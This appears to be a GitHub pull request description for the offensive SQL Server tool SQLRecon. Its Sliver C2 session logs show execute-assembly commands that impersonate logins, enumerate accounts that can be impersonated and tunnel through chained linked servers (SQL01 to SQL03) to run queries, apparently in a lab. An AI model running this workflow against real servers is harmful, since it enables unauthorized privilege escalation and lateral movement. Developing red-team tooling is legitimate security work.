sliver (NEUTRAL_WRAP) > execute-assembly /home/kali/backpack/winaries/csharp/SQLRecon-v3.3.exe /a:WinToken /h:SQL01 /i:webapp01 /m:iwhoami

[*] Output:
[*] Determining user permissions on SQL01 as 'webapp01'
[*] Logged in as [X] ERROR: The webapp01 login can not be impersonated.
[*] Mapped to the user [X] ERROR: The webapp01 login can not be impersonated.
[*] [+] Roles:
 |-> User is NOT a member of sysadmin role.
 |-> User is NOT a member of setupadmin role.
 |-> User is NOT a member of serveradmin role.
 |-> User is NOT a member of securityadmin role.
 |-> User is NOT a member of processadmin role.
 |-> User is NOT a member of diskadmin role.
 |-> User is NOT a member of dbcreator role.
 |-> User is NOT a member of bulkadmin role.
```
This is just a sketch of the possibilities that are currently closed to me.

## After
After a lot of sweat and time trying to understand the initial code, I managed to get what I wanted. The integration of impersonification whenever the `/i` argument is present.

- Enumeration of impersonable users:
```shell
sliver (NEUTRAL_WRAP) > execute-assembly /home/kali/backpack/winaries/csharp/SQLRecon.exe /a:WinToken /h:SQL01 /m:impersonate

[*] Output:
[+] Logged in as NT AUTHORITY\SYSTEM
[+] Mapped to the user dbo
[*] Enumerating accounts that can be impersonated on SQL01
[*] Current user is a sysadmin and can impersonate any account.
name |
-------
sa |
SQL01\Administrator |
NT SERVICE\SQLWriter |
NT SERVICE\Winmgmt |
NT Service\MSSQL$SQLEXPRESS |
NT AUTHORITY\SYSTEM |
NT SERVICE\SQLTELEMETRY$SQLEXPRESS |
webapp01 |
```

- Impersonate someone
```shell
sliver (NEUTRAL_WRAP) > execute-assembly /home/kali/backpack/winaries/csharp/SQLRecon.exe /a:WinToken /h:SQL01 /i:webapp01 /m:whoami

[*] Output:
[+] Logged in as server user 'NT AUTHORITY\SYSTEM'
[+] Mapped to the username 'dbo'
[*] Trying to impersonate 'webapp01'
[+] Impersonated server user 'webapp01'
[+] Mapped to the username 'dbo'
[*] Determining user permissions on SQL11
[*] Roles:
 |-> User is a member of public role.
 |-> User is NOT a member of db_owner role.
 |-> User is NOT a member of db_accessadmin role.
 |-> User is NOT a member of db_securityadmin role.
 |-> User is NOT a member of db_ddladmin role.
 |-> User is NOT a member of db_backupoperator role.
 |-> User is NOT a member of db_datareader role.
 |-> User is NOT a member of db_datawriter role.
 |-> User is NOT a member of db_denydatareader role.
 |-> User is NOT a member of db_denydatawriter role.
 |-> User is a member of sysadmin role.
 |-> User is a member of setupadmin role.
 |-> User is a member of serveradmin role.
 |-> User is a member of securityadmin role.
 |-> User is a member of processadmin role.
 |-> User is a member of diskadmin role.
 |-> User is a member of dbcreator role.
 |-> User is a member of bulkadmin role.
```


- Impersonate someone and go to linked server
```shell
sliver (NEUTRAL_WRAP) > execute-assembly /home/kali/backpack/winaries/csharp/SQLRecon.exe /a:WinToken /h:SQL01 /i:webapp01 /l:SQL02 /m:llinks

[*] Output:
[+] Logged in as system user 'NT AUTHORITY\SYSTEM'
[+] Mapped to the username 'dbo'
[*] Trying to impersonate 'webapp01'
[+] Impersonated server user 'webapp01'
[+] Mapped to the username 'dbo'
[*] Additional SQL links on SQL02 via SQL01
name | product | provider | data_source |
------------------------------------------
SQL03 | SQL Server | SQLNCLI | SQL03 |
```

## Additional Updates

### Modifying the MS SQL Linked Servers Output
From:
```shell
sliver (NEUTRAL_WRAP) > execute-assembly /home/kali/backpack/winaries/csharp/SQLRecon.exe /a:WinToken /h:SQL01 /m:links
[*] Output:
[*] Additional SQL links on SQL01
name | product | provider | data_source |
------------------------------------------
SQL02 | SQL Server | SQLNCLI | SQL02 |
SQL03 | SQL Server | SQLNCLI | SQL03 |
```
To:
```shell
sliver (NEUTRAL_WRAP) > execute-assembly /home/kali/backpack/winaries/csharp/SQLRecon.exe /a:WinToken /h:SQL01 /m:links

[*] Output:
[*] Logged in as system user 'NT AUTHORITY\SYSTEM'
[*] Mapped to the username 'dbo'
[*] Additional SQL links and login mappings on SQL01
Linked Server | product | provider | data_source | Local Login | Is Self Mapping | Remote Login |
--------------------------------------------------------------------------------------------------
SQL02 | SQL Server | SQLNCLI | SQL02 | webapp01 | False | webappGroup |
SQL03 | SQL Server | SQLNCLI | SQL03 | webapp01 | False | testAccount |
```

Same thing applied for `llinks` command.

### Tunneling Through Chained SQL Links
In order to close [my own issue](https://github.com/skahwah/SQLRecon/issues/16), I build a way to deal with chained SQL Links.
```shell
sliver (LITTLE_COMMERCE) > execute-assembly /home/kali/backpack/winaries/csharp/SQLRecon.exe /a:WinToken /h:SQL01 /i:webapp01 /t:SQL02,SQL03 /m:twhoami

[*] Output:
[+] Logged in as server user 'NT AUTHORITY\SYSTEM'
[+] Mapped to the username 'dbo'
[*] Trying to impersonate 'webapp01'
[+] Impersonated server user 'webapp01'
[+] Mapped to the username 'dbo'
[+] Logged in as server user 'webapps'
[+] Mapped to the username 'guest'
[*] Determining user permissions from tunnel 0 -> SQL02 -> SQL03
[*] Roles:
 |-> User is a member of public role.
 |-> User is NOT a member of db_owner role.
 |-> User is NOT a member of db_accessadmin role.
 |-> User is NOT a member of db_securityadmin role.
 |-> User is NOT a member of db_ddladmin role.
 |-> User is NOT a member of db_backupoperator role.
 |-> User is NOT a member of db_datareader role.
 |-> User is NOT a member of db_datawriter role.
 |-> User is NOT a member of db_denydatareader role.
 |-> User is NOT a member of db_denydatawriter role.
 |-> User is NOT a member of sysadmin role.
 |-> User is NOT a member of setupadmin role.
 |-> User is NOT a member of serveradmin role.
 |-> User is NOT a member of securityadmin role.
 |-> User is NOT a member of processadmin role.
 |-> User is NOT a member of diskadmin role.
 |-> User is NOT a member of dbcreator role.
 |-> User is NOT a member of bulkadmin role.
```

```shell
sliver (LITTLE_COMMERCE) > execute-assembly /home/kali/backpack/winaries/csharp/SQLRecon.exe /a:WinToken /h:SQL01 /i:webapp01 /t:SQL02,SQL03 /m:timpersonate

[*] Output:
[+] Logged in as server user 'NT AUTHORITY\SYSTEM'
[+] Mapped to the username 'dbo'
[*] Trying to impersonate 'webapp01'
[+] Impersonated server user 'webapp01'
[+] Mapped to the username 'dbo'
[*] Tunneled through 0 -> SQL02 -> SQL03 and emerging with the user 'webapps'
testAccount can potentially be impersonated on the linked server.
```

```shell
sliver (LITTLE_COMMERCE) > execute-assembly /home/kali/backpack/winaries/csharp/SQLRecon.exe /a:WinToken /h:SQL01 /i:webapp01 /t:SQL02,SQL03 /m:tquery /c:\"SELECT * from sys.server_principals;\"

[*] Output:
[+] Logged in as server user 'NT AUTHORITY\SYSTEM'
[+] Mapped to the username 'dbo'
[*] Trying to impersonate 'webapp01'
[+] Impersonated server user 'webapp01'
[+] Mapped to the username 'dbo'
[*] Executing 'SELECT * from sys.server_principals;' from tunnel 0 -> SQL02 -> SQL03
name | principal_id | sid | type | type_desc | is_disabled | create_date | modify_date | default_database_name | default_language_name | credential_id | owning_principal_id | is_fixed_role |
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
sa | 1 | System.Byte[] | S | SQL_LOGIN | False | 4/8/2003 9:10:35 AM | 7/6/2020 3:16:14 AM | master | us_english |  |  | False |
public | 2 | System.Byte[] | R | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |  |  |  | 1 | False |
sysadmin | 3 | System.Byte[] | R | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |  |  |  | 1 | True |
securityadmin | 4 | System.Byte[] | R | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |  |  |  | 1 | True |
serveradmin | 5 | System.Byte[] | R | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |  |  |  | 1 | True |
setupadmin | 6 | System.Byte[] | R | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |  |  |  | 1 | True |
processadmin | 7 | System.Byte[] | R | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |  |  |  | 1 | True |
diskadmin | 8 | System.Byte[] | R | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |  |  |  | 1 | True |
dbcreator | 9 | System.Byte[] | R | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |  |  |  | 1 | True |
bulkadmin | 10 | System.Byte[] | R | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |  |  |  | 1 | True |
testAccount | 266 | System.Byte[] | S | SQL_LOGIN | False | 7/6/2020 3:16:59 AM | 7/6/2020 3:16:59 AM | master | us_english |  |  | False |
webapps | 267 | System.Byte[] | S | SQL_LOGIN | False | 7/6/2020 4:09:52 AM | 7/7/2020 1:05:41 PM | master | us_english |  |  | False |
```

In fact, now that this feature is built, a huge refactor could be done in order to remove the `/l` option because to access the first linked server, it's just:
```shell
sliver (LITTLE_COMMERCE) > execute-assembly /home/kali/backpack/winaries/csharp/SQLRecon.exe /a:WinToken /h:SQL01 /i:webapp01 /t:SQL02 /m:timpersonate

[*] Output:
[+] Logged in as server user 'NT AUTHORITY\SYSTEM'
[+] Mapped to the username 'dbo'
[*] Trying to impersonate 'webapp01'
[+] Impersonated server user 'webapp01'
[+] Mapped to the username 'dbo'
[*] Tunneled through 0 -> SQL02 and emerging with the user 'webappGroup'
[*] The user can impersonate any account on the linked server.
name |
-------
sa |
SQL02\Administrator |
NT SERVICE\SQLWriter |
NT SERVICE\Winmgmt |
NT Service\MSSQL$SQLEXPRESS |
NT AUTHORITY\SYSTEM |
NT SERVICE\SQLTELEMETRY$SQLEXPRESS |
webappGroup |
```

I've only done the `timpersonate` and `tusers` modules while waiting for you to come back. Because I'm really in favor of deleting `/l` and integrating `/t` only. 
Some refactoring will be necessary, but I'm happy to do it!


## What's next?
I'm pretty sure we could delete all modules that start with `i`, since impersonification can be initiated before the execution of any module as long as the `/i` argument is supplied! In fact, I am totally sure for commands such as `ilinks`, `iwhoami` and so on. But for other things such as `OLE` and `SSCM`, not at all.

I am keen on receiving your opinion about that.

In case you accept this PR, I'll let you update everything version etc. I'm not quite comfortable with it yet!